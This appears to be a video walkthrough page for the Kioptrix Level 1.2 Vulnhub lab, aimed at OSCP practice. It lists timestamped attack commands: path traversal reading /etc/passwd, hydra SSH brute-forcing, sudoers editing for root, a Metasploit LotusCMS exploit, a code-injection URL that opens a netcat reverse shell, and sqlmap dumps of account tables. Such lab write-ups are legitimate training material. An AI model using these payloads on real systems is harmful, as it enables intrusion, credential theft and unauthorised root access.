Kioptrix: Level 1.2 (#3) Walkthrough (Vulnhub| OSCP Model)
Kioptrix (#3) Walkthrough Summary
Twitter: https://twitter.com/AppSecJay
LinkedIn: https://www.linkedin.com/in/jaganboda/
Summary: 00:01
Enumeration: 00:25 Min
Useful commands:
netdiscover -r 192.168.0.0/24
nmap -A -v 192.168.48.160
nikto -h http://192.168.48.160
Gaining Access (Exploitation):
Method 2 Exploitation: 4:00 Min
Useful commands:
http://192.168.48.160/index.php?system=../../../../../etc/passwd%00.
hydra -e nsr -l loneferret -P /root/Documents/rockyou.txt 192.168.48.160 ssh -t 4
Privilege Escalation: 05:42 Min
Useful Commands:
export TERM=xterm
Note: if you’re not sure how to navigate HT, hold the Alt key and use the highlighted letters / numbers on-screen; e.g. Alt + F opens the File menu
sudo ht /etc/sudoers
Then I added /bin/bash to loneferret’s entry
sudo bash
Method 1 Exploitation: (Metasploit):: 7:57 Min
http://www.exploit-db.com/exploits/15964/
Metasploit:
use exploit/multi/http/lcms_php_exec
Privilege Escalation: 12:51 Min
+
(Manual Exploitation): 13:41 Min
http://kioptrix3.com/index.php?page=index%27);${system(%27nc%20-e%20/bin/sh%20192.168.48.162%206666%27)};%23py
nc -lvp 6666
echo “import pty; pty.spawn(‘/bin/bash’)” > /tmp/jb.py
Method 3 Exploitation:
Exploitation: 15:11 Min
https://www.exploit-db.com/exploits/15891/
sqlmap -u “http://kioptrix3.com/gallery/gallery.php?id=1&sort=filename#photos” –dbms=MySQL
sqlmap -u “http://kioptrix3.com/gallery/gallery.php?id=1&sort=filename#photos” –dbms=MySQL -D gallery –tables
sqlmap -u “http://kioptrix3.com/gallery/gallery.php?id=1&sort=filename#photos” –dbms=MySQL -D gallery -T dev_accounts –dump
Privilege Escalation: 17:46 Min
Summary:19:29 Min
SecureArmors 
Leave a comment